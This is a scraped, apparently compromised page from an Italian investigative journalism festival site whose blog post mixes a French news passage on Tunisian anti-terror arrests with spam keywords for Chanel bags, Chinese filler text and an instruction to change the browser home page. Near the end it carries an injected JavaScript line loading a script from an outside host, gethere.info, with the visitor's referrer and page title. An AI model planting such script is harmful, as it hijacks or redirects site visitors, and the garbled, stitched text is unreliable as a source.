Festival Internazionale
 Giornalismo Investigativo 

Anteprima Roma 24-25 gennaio 2014

Il Festival Internazionale Giornalismo Investigativo si propone come uno spazio aperto, dove esperti internazionali di tecniche investigative si confronteranno attraverso laboratori e seminari su esperienze, metodologie e strumenti, ed un luogo di presentazione al largo pubblico con un calendario di eventi culturali, tematici e aggregativi di forte richiamo.

39_3_1926

Posted on 26 nov 2016 in Uncategorized | 0 comments

sélectionnez Démarrer avec la page d’accueil. Danslasection"Page d’accueil", saisissez "[URL de la page coutante]" dans la zone de texte. Cliquez sur le bouton OK.

Ansar Echaria projetait de diviser la Tunisie en trois émirats islamiques,
chanel 2.55 borse chanel 30226.Nous avons fait avorter un complot visant la création de trois émirats islamiques en Tunisie. Nous avons interpellé trois cents terroristes qui croupissent en prison et font l’objet de plusieurs instructions auprès de la justice.

Pour Ben Jeddou, il s’agit d’un seul document et non de deux documents comme l’ont révélé certains médias. Le document en question a été formulé en deux versions. Il est parvenu à mon bureau après l’assassinat de Brahmi tout simplement parce que la direction de la sécurité extérieure avait pris l’habitude depuis la nuit des temps qu’une fois clôturée l’enquête sur la véracité des informations reçues, le ministre est informé. C’est une faute et nous avons décidé de corriger le processus. Aujourd’hui,
chanel accessori chanel caso, je reçois directement toute information relative à n’importe quelle menace d’assassinat de quiconque parmi les personnalités politiques aussi bien de l’opposition que de la Troïka.

20 mille arrestations en six mois

Ces dysfonctionnements parmi les différentes directions au sein du ministère de l’Intérieur n’ont pas empêché, ajoute le ministre, nos policiers de faire du bon travail. Ainsi, en six mois, il a été procédé à l’arrestation de 20.000 individus dont plus de 300 terroristes.

Et Ben Jeddou de livrer les informations suivantes : Les frappes qui ont ciblé Jebel Chaâmbi et Jebel Semmama nous ont permis de découvrir que 14 terroristes se cachent actuellement à Chaâmbi (y compris Ghadhgadhi, le présumé assassin de Chokri Belaïd) et que 14 autres se terrent à Jebel Semmama. Sur ces 28 terroristes,
borse chanel, quatorze sont algériens et obéissent aux ordres de Mossaâb Abdelouadoud.

D’autre part, les forces de sécurité opèrent quotidiennement des descentes dans les maisons des présumés terroristes et dans les mosquées. Des armes, des ordinateurs et des documents 相关的主题文章:

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Reply

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>